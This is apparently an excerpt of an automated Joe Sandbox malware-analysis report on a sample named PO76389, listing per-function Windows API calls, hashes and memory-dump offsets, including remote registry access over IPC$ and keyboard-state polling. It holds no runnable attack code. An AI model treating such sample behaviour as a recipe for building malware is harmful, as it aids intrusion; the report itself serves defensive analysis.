                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: LoadString_wprintf$__swprintf_memmove
                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                    • API String ID: 2116804098-2391861430
                                                    • Opcode ID: c1d356ed6d3db3a7a608377b5c226e51dc72ae68baa3ef30968f6a07e9be0f13
                                                    • Instruction ID: 296fd86f560bed7cfbee55c745fbd70667b89e5c0f1c50c0e28b4e98c100acc7
                                                    • Opcode Fuzzy Hash: c1d356ed6d3db3a7a608377b5c226e51dc72ae68baa3ef30968f6a07e9be0f13
                                                    • Instruction Fuzzy Hash: 3651D471D00109BBCB14EBA1DD86EEEB779AF14308F10445BF205A21A1DA796F48EB68
                                                    APIs
                                                    • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 004FD37F
                                                      • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                    • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 004FD3A0
                                                    • __swprintf.LIBCMT ref: 004FD3F3
                                                    • _wprintf.LIBCMT ref: 004FD499
                                                    • _wprintf.LIBCMT ref: 004FD4B7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: LoadString_wprintf$__swprintf_memmove
                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                    • API String ID: 2116804098-3420473620
                                                    • Opcode ID: 86e4d020879c112159f51dc3924b257d4c87fdcd48b668a627ab831ba0236ff2
                                                    • Instruction ID: a6eed8346f16f404621c33b3109ea6ae0accaa01bc89546603a4caaa67d7da3e
                                                    • Opcode Fuzzy Hash: 86e4d020879c112159f51dc3924b257d4c87fdcd48b668a627ab831ba0236ff2
                                                    • Instruction Fuzzy Hash: 2E51E271D00108BBCB14FBA1DD86EEEB779AF14309F10445BF205B21A1EA796F48EB64
                                                    APIs
                                                      • Part of subcall function 004B7E53: _memmove.LIBCMT ref: 004B7EB9
                                                    • _memset.LIBCMT ref: 004EAF74
                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004EAFA9
                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 004EAFC5
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 004EAFE1
                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 004EB00B
                                                    • CLSIDFromString.COMBASE(?,?), ref: 004EB033
                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 004EB03E
                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 004EB043
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                    • API String ID: 1411258926-22481851
                                                    • Opcode ID: 7ff807b118e5a84b76a1355c3aa25715558b456477fd383a2f5cfed5114391e7
                                                    • Instruction ID: c3e5335a9692f599a159f9eda1c3c0386021189c8e8914a41ca718cc566b8207
                                                    • Opcode Fuzzy Hash: 7ff807b118e5a84b76a1355c3aa25715558b456477fd383a2f5cfed5114391e7
                                                    • Instruction Fuzzy Hash: 8D413C75C10229ABCF11EBA5DC859EEB778FF14704F00446AE801A3261EB74AE05CBA4
                                                    APIs
                                                    • __swprintf.LIBCMT ref: 004F7226
                                                    • __swprintf.LIBCMT ref: 004F7233
                                                      • Part of subcall function 004D234B: __woutput_l.LIBCMT ref: 004D23A4
                                                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 004F725D
                                                    • LoadResource.KERNEL32(?,00000000), ref: 004F7269
                                                    • LockResource.KERNEL32(00000000), ref: 004F7276
                                                    • FindResourceW.KERNEL32(?,?,00000003), ref: 004F7296
                                                    • LoadResource.KERNEL32(?,00000000), ref: 004F72A8
                                                    • SizeofResource.KERNEL32(?,00000000), ref: 004F72B7
                                                    • LockResource.KERNEL32(?), ref: 004F72C3
                                                    • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 004F7322
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                    • String ID: L6V
                                                    • API String ID: 1433390588-2379597826
                                                    • Opcode ID: 8aa17d0990e6c7f3c1ec96181a82cee1fe34b2ff03d1bde92e0b56ea27cb4677
                                                    • Instruction ID: 7cf1eae5743816df5053ff720dc5d945e95e3fa6d5e40e4d979002bcc381930f
                                                    • Opcode Fuzzy Hash: 8aa17d0990e6c7f3c1ec96181a82cee1fe34b2ff03d1bde92e0b56ea27cb4677
                                                    • Instruction Fuzzy Hash: DD31AEB590425ABBCB019F60ED89ABF7BB8FF04340B004416FE06D2250E73CD955EAB8
                                                    APIs
                                                      • Part of subcall function 004B7E53: _memmove.LIBCMT ref: 004B7EB9
                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 004F843F
                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 004F8455
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004F8466
                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 004F8478
                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 004F8489
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: SendString$_memmove
                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                    • API String ID: 2279737902-1007645807
                                                    • Opcode ID: 91671a4e0b55b31a3ff4dba9740d9267a0123e73c21c21882a92b31885b86203
                                                    • Instruction ID: a35f30011693665a15dfd74ceccc32cc0832017178b5f70c4d7611b5fc0fce06
                                                    • Opcode Fuzzy Hash: 91671a4e0b55b31a3ff4dba9740d9267a0123e73c21c21882a92b31885b86203
                                                    • Instruction Fuzzy Hash: DE11C1A1A4026D79D720A7A2CC4ADFF7E7CFB91B04F00082EB411A71C1EEA45A45C6B4
                                                    APIs
                                                    • timeGetTime.WINMM ref: 004F809C
                                                      • Part of subcall function 004CE3A5: timeGetTime.WINMM(?,75A8B400,00526163), ref: 004CE3A9
                                                    • Sleep.KERNEL32(0000000A), ref: 004F80C8
                                                    • EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 004F80EC
                                                    • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 004F810E
                                                    • SetActiveWindow.USER32 ref: 004F812D
                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 004F813B
                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 004F815A
                                                    • Sleep.KERNEL32(000000FA), ref: 004F8165
                                                    • IsWindow.USER32 ref: 004F8171
                                                    • EndDialog.USER32(00000000), ref: 004F8182
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                    • String ID: BUTTON
                                                    • API String ID: 1194449130-3405671355
                                                    • Opcode ID: 5c445997f7ba6b64c23839eca72d432cccffda721b77475d7a0f413ccb41dd0c
                                                    • Instruction ID: ae3321daeec1c44d25ecad5fa557d4a1a0ad705d29b85d301a36715d79a1c35c
                                                    • Opcode Fuzzy Hash: 5c445997f7ba6b64c23839eca72d432cccffda721b77475d7a0f413ccb41dd0c
                                                    • Instruction Fuzzy Hash: 7821AFB0240208BFEB165B21BC8DE363B3BE720398B04011AF61586361CF764D4DB625
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                    • String ID: 0.0.0.0
                                                    • API String ID: 208665112-3771769585
                                                    • Opcode ID: d22f61621cc09f839a67e35e8eab8a8616aaf264a1d0507b8505d4e0ba545ec7
                                                    • Instruction ID: d17ccfce657fc13021b02d4c0e554cf9fabb80436972b1ec291234ddca55f07d
                                                    • Opcode Fuzzy Hash: d22f61621cc09f839a67e35e8eab8a8616aaf264a1d0507b8505d4e0ba545ec7
                                                    • Instruction Fuzzy Hash: AD1108B1908119ABDB24AB31AC45FEA777CEB00724F0000ABF50596290EEBCDB858668
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
                                                    • String ID:
                                                    • API String ID: 3566271842-0
                                                    • Opcode ID: 5cbcbb012bc263274fdbbe8af7e77357c40082116e7220115a533dbba9afc647
                                                    • Instruction ID: 201afefde784cbff58da6e2eb325adfb5a3c22d408966c593c93e62118b66440
                                                    • Opcode Fuzzy Hash: 5cbcbb012bc263274fdbbe8af7e77357c40082116e7220115a533dbba9afc647
                                                    • Instruction Fuzzy Hash: AE711D75A00219AFDB10DFA5C884ADEBBB8FF48314F04849AE909AB251D734EE40CF94
                                                    APIs
                                                    • GetKeyboardState.USER32(?), ref: 004F3908
                                                    • SetKeyboardState.USER32(?), ref: 004F3973
                                                    • GetAsyncKeyState.USER32(000000A0), ref: 004F3993
                                                    • GetKeyState.USER32(000000A0), ref: 004F39AA
                                                    • GetAsyncKeyState.USER32(000000A1), ref: 004F39D9
                                                    • GetKeyState.USER32(000000A1), ref: 004F39EA
                                                    • GetAsyncKeyState.USER32(00000011), ref: 004F3A16
                                                    • GetKeyState.USER32(00000011), ref: 004F3A24
                                                    • GetAsyncKeyState.USER32(00000012), ref: 004F3A4D
                                                    • GetKeyState.USER32(00000012), ref: 004F3A5B
                                                    • GetAsyncKeyState.USER32(0000005B), ref: 004F3A84
                                                    • GetKeyState.USER32(0000005B), ref: 004F3A92
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: State$Async$Keyboard
                                                    • String ID:
                                                    • API String ID: 541375521-0
                                                    • Opcode ID: 0b320353d7dc84ce4ba5d7e82674f657a12a409278b6331b1499d543db51c1c6
                                                    • Instruction ID: 0bcc58201778fecf0effb2926aae5798fef50c95ebdef5000c3400efa92c3e0f
                                                    • Opcode Fuzzy Hash: 0b320353d7dc84ce4ba5d7e82674f657a12a409278b6331b1499d543db51c1c6
                                                    • Instruction Fuzzy Hash: FB51B860A0478C29FB35EFA588117BBABF45F01385F08459FD7C2562C2DA5C9B8CC769
                                                    APIs
                                                    • GetDlgItem.USER32(?,00000001), ref: 004EFB19
                                                    • GetWindowRect.USER32(00000000,?), ref: 004EFB2B
                                                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 004EFB89
                                                    • GetDlgItem.USER32(?,00000002), ref: 004EFB94
                                                    • GetWindowRect.USER32(00000000,?), ref: 004EFBA6
                                                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 004EFBFC
                                                    • GetDlgItem.USER32(?,000003E9), ref: 004EFC0A
                                                    • GetWindowRect.USER32(00000000,?), ref: 004EFC1B
                                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 004EFC5E
                                                    • GetDlgItem.USER32(?,000003EA), ref: 004EFC6C
                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 004EFC89
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004EFC96
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                    • String ID:
                                                    • API String ID: 3096461208-0
                                                    • Opcode ID: cb3702b4e1e23dfc10fcc0054e52cb3f5fe3029e810c0956d9e074368577ecdd
                                                    • Instruction ID: 0db81d06687c26c77b77ecdddff34344052e1c4448b95530b0f52fd2e61cf004
                                                    • Opcode Fuzzy Hash: cb3702b4e1e23dfc10fcc0054e52cb3f5fe3029e810c0956d9e074368577ecdd
                                                    • Instruction Fuzzy Hash: 10512071B00209AFDB18CFA9DD95AAEBBBAFB98311F148139F915D7390D774AD048B10
                                                    APIs
                                                      • Part of subcall function 004CB155: GetWindowLongW.USER32(?,000000EB), ref: 004CB166
                                                    • GetSysColor.USER32(0000000F), ref: 004CB067
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ColorLongWindow
                                                    • String ID:
                                                    • API String ID: 259745315-0
                                                    • Opcode ID: e9f6d4d94cf304310b4bf41b1cf219e3896c9295394e3fe3fc9ee3c7ff3b4bac
                                                    • Instruction ID: eaa5b44f36f1cba96a390e08220059d60359399adb7449af57764d10bc6f36cd
                                                    • Opcode Fuzzy Hash: e9f6d4d94cf304310b4bf41b1cf219e3896c9295394e3fe3fc9ee3c7ff3b4bac
                                                    • Instruction Fuzzy Hash: 8B41C3351005109FDB205F39E84AFBA3B75EB16721F18426AFD758A2E1C7348C45EBA6
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                    • String ID:
                                                    • API String ID: 136442275-0
                                                    • Opcode ID: 156b3f7c6e23dfb8567dc48f29857763a306993c2a9cd9472b483822ee660ae8
                                                    • Instruction ID: c6743a9a7ef636430402261006fe447bbf78b804ca8b8ab157c459c79ac176cc
                                                    • Opcode Fuzzy Hash: 156b3f7c6e23dfb8567dc48f29857763a306993c2a9cd9472b483822ee660ae8
                                                    • Instruction Fuzzy Hash: 5341F2B290411C6ADB21EB51CC65EEE73BCAB08314F1041E7F619A2151EB799BD4CF68
                                                    APIs
                                                    • __swprintf.LIBCMT ref: 004B84E5
                                                    • __itow.LIBCMT ref: 004B8519
                                                      • Part of subcall function 004D2177: _xtow@16.LIBCMT ref: 004D2198
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: __itow__swprintf_xtow@16
                                                    • String ID: %.15g$0x%p$False$True
                                                    • API String ID: 1502193981-2263619337
                                                    • Opcode ID: 197212c294785e0671fd869d5c992cb0cd21676da739628ba9c14277ce6fda33
                                                    • Instruction ID: 701713eaa0ceb53b064aaefb6251a15d2c65dd492437dda5f3858a22fa01c13e
                                                    • Opcode Fuzzy Hash: 197212c294785e0671fd869d5c992cb0cd21676da739628ba9c14277ce6fda33
                                                    • Instruction Fuzzy Hash: 0B412931600605EBDB24DF34D841FAA7BE9BF44314F20485FE449C7291FA399A42CB25
                                                    APIs
                                                    • _memset.LIBCMT ref: 004D5CCA
                                                      • Part of subcall function 004D889E: __getptd_noexit.LIBCMT ref: 004D889E
                                                    • __gmtime64_s.LIBCMT ref: 004D5D63
                                                    • __gmtime64_s.LIBCMT ref: 004D5D99
                                                    • __gmtime64_s.LIBCMT ref: 004D5DB6
                                                    • __allrem.LIBCMT ref: 004D5E0C
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004D5E28
                                                    • __allrem.LIBCMT ref: 004D5E3F
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004D5E5D
                                                    • __allrem.LIBCMT ref: 004D5E74
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004D5E92
                                                    • __invoke_watson.LIBCMT ref: 004D5F03
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                    • String ID:
                                                    • API String ID: 384356119-0
                                                    • Opcode ID: 44019df33dda40162e7ad5693cac5fdd13db5b94ac58de4e6029986730a9c23d
